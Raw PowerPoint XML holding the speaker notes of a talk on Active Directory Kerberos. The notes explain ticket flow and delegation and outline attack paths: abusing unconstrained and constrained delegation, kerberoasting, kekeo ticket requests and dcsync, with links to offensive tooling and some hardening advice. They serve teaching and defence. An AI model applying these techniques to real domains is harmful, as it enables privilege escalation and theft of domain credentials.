              <a:t> style, and a bit of a gotcha with a lot of tools is that you have to specify it in all caps.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Technically the key distribution center is made up of the authentication server and ticket granting server, but on Windows this is all just the domain controller, so I’m not going to worry about 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Kerberos uses several different keys. Long term keys which are derived from the user or resource account password, and session keys which are created for encryption of communications for each session.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core concept within Kerberos is “tickets”, these are made up of two parts a bit you can decrypt and a bit you can’t. The bit you can decrypt contains, amongst other things, the session key to use with the resource service, and you can decrypt it because its encrypted with your long term key. The bit you can’t decrypt also contains the session key, but its encrypted with the resource service’s long term key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2811450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 the KRBTGT account key!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent DA from logging onto any computer other than the DC, and delegate all other admin rights to other admin groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect your backups!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regular change the KRBTGT account password. You need to change it, wait a day for replication to complete, and then change it again, to purge both the current hash from the history – otherwise the old password can still be used. Microsoft have provided a script and guidance for this which must be read closely before doing this – if you get it wrong you are going to have the worst week of your life while you recover.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9C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3055318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Kerberos delegation is giving an account the right to impersonate another account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I can see absolutely no way that that could possible blow up in your face….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained, unconstrained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Double hop…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Double hop. Delegation. Intermediary service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>iis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) can authenticate to another service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) as the user. Can protect accounts to prevent this but not default. Find service with delegation, compromise that, impersonate da? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3694652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Delegation solves a problem in multi tiered applications sometimes referred to as the “Kerberos Double Hop Issue”. Traditionally when a user requests a resource from a front end server, the front end server will authenticate the user, then the front end server will use its service account credentials to access the back end server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This isn’t great from an accountability perspective as all interaction between the front and backend server is as the front end service account rather than as the user, and the from a permissions perspective we are also granting rights to a service account sufficient for all users it may be serving, rather than granting those permissions to the user.</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8583774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we grant the service account on the front end server permission to impersonate the user, then it can request a ticket on behalf of the user and authenticate to the backend system in the context of the user.</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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="827166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 you know, its not quite that simple….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service doesn’t just get to request access as the user. Its got to already have the user’s TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The way that works is that when the user requests a TGS for a service with unconstrained delegation rights the KDC will include the user’s TGT in the TGS, so that when the user sends the TGS to the front end service, it can decrypt the TGS and retrieve the TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TGT is then stored on the server for future use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8937426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abuse this wonderful feature?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three types of delegation, the first one is unconstrained, which is configured with the option called “Trust this computer for delegation to any service (Kerberos only)”, I’ll come onto the other two in a minute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First we need to find an account with unconstrained delegation enabled, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> filter here does that. The first one finds computer accounts, and the second finds user accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then you need to find the server where that account is being used – for the computer account that should be pretty easy – the name of the account is the name of the computer. For user account’s you’d need to look in the service principle names attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next we simply need to compromise those servers…. Trivial task for you all I’m sure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then finally you can use those TGT’s you recover from memory to interact with other services. So I hope you were paying attention earlier.</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052388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types of delegation are called constrained delegation, and comes in two flavors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first is “Use Kerberos only” which lets the service impersonate the user to a list of specified services, this can be handy for privilege escalation and lateral movement depending on what is configured, but in general if they are doing it right it won’t directly result in a win. However it might do something like let you access another service which has been misconfigured and allows you to escalate privileges with a bit more effort.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second type of constrained delegation is “use any authentication protocol”. This one can be much more interesting. It is required when the user doesn’t use Kerberos to authenticate to the front end server, maybe they have authentication using NTLM, or some custom authentication form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol transition is used to move the authentication to Kerberos… The extension Microsoft implemented that makes this possible is called “Service For User to Self” (S4U2Self)</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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144937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authenticates to the front end server using something other than Kerberos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The front end server then requests a TGT from the KDC without specifying a username.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The KDC checks that the service account is trusted to authenticate for delegation, and that the user account isn’t blocked and returns a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forwadable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ticket for the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service then passes that back to get a TGS ticket for the backend service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Again the KDC checks that the front end service is permitted to allowed to delegate authentication to the backend server, then returns the TGS ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The front end server, then provides the TGS ticket to the backend service to authenticate as the user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11345745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find the computer and user accounts with constrained delegation enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then check what the accounts can authenticate to as the user, by checking the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msds-allowedto-delegateto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute on the service account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromise those accounts somehow, this might be exploitation of a server to get the computer account hash, or it might be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kerbroasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to get the user account password, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kekeo’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> asktgt.exe or s4u.exe to request a ticket for the user and service you are targeting, as the vulnerable service account you have compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If LDAP is allowed you can do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to get the domain hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://blogs.technet.microsoft.com/pie/2017/06/30/credential-theft-made-easy-with-kerberos-delegation/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30164701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appreciate that was very brief… and to be honest it was the last thing I looked into so didn’t dive as deep into it as I would like. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These two links are excellent resources to look into this more, and have examples of exploitation.</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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424843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step through the authentication process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user on their workstation wants to connect to the file server service on the remote server.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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a) The user sends their username to the KDC and requests a ticket.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0b) The KDC responds with an error demanding that the user authenticates themselves first. This is for backwards compatibility. Pre authentication being required is the default in Windows, and in fact all of Kerberos v5.  However in v4 it wasn’t – but we’ll come onto that in a few minutes.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1a. Password converted to encryption key (for RC4-HMAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> this is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NTLM hash default for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XP and 2003, for Vista and above an AES key is used by default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>), a timestamp is encrypted with the user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>and sent to the KDC as an authenticator in the authentication ticket (TGT) request (AS-REQ).</a:t>
            </a:r>
          </a:p>
          <a:p>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1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc), generates a session key for use between the user and itself, and creates Ticket-Granting Ticket (TGT), encrypting the session key with the user’s long term key and its own long term key.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2. The TGT is encrypted, signed, &amp; delivered to the user (AS-REP). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.</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3. The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT &amp; validates PAC checksum – If the DC can open the ticket &amp; the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.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4. The TGS is encrypted using the target service accounts’ long term key and sent to the user (TGS-REP).</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5.The user connects to the server hosting the service on the appropriate port &amp; presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash.</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6. If mutual authentication is required by the client (think MS15-011: the Group Policy patch from February that added UNC hardening).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2842566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78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398245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quick look at that as a packet capture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So first we send the AS-REQ with the Kerberos realm (domain name) and our username to the KDC (domain controller)</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412210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receive the error from the domain controller stating pre authentication is required for the user.</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147393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send another AS-REQ with a timestamp encrypted with the user’s key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This use of timestamps is the reason why time accurate time is important in Kerberos – if you are having problems and seeing SKEW errors, its probably because your machine’s time is more than 5 minutes out from the domain controller’s time. (that 5 minutes can be configured, but I highly doubt any administrator is going to bother unless it’s a regulatory requirement in hardened environments….</a:t>
            </a:r>
          </a:p>
          <a:p>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152047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have used the correct password for the user account, the KDC has been able to decrypt the timestamp using the key stored in its database so has validated that they are communicating with the legitimate user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They respond with a ticket granting ticket. This has the session key for communicating with the KDC encrypted with both the user’s key and the Kerberos service key. By default this is valid for 10 hours and can be renewed within that time up to a maximum of 7days.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145536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0586" y="114301"/>
            <a:ext cx="9905998" cy="904134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1357911"/>
            <a:ext cx="9905998" cy="4433289"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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10/12/2018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hashcat/hashcat/issues/138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PowerShellMafia/PowerSploit/blob/445f7b2510c4553dcd9451bc4daccb20c8e67cbb/Recon/PowerView.ps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exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/activedirectory/roasting-as-rep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hyperlink" Target="https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/run/kirbi2john.py" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.p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msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken(v=vs.110).aspx" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/5690b09027b53a5932e42399f6943e03fa32e549/Recon/PowerView.ps1#L2087-L2089" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccount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witter.com/PyroTek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adsecurity.org/?p=3458"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username@DOMAIN_NAME.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file:///\\dc1.domain_name.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file:///\\dc1.domain.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hyperlink" Target="https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e5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B159-B52F-E947-B712-9029562060EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
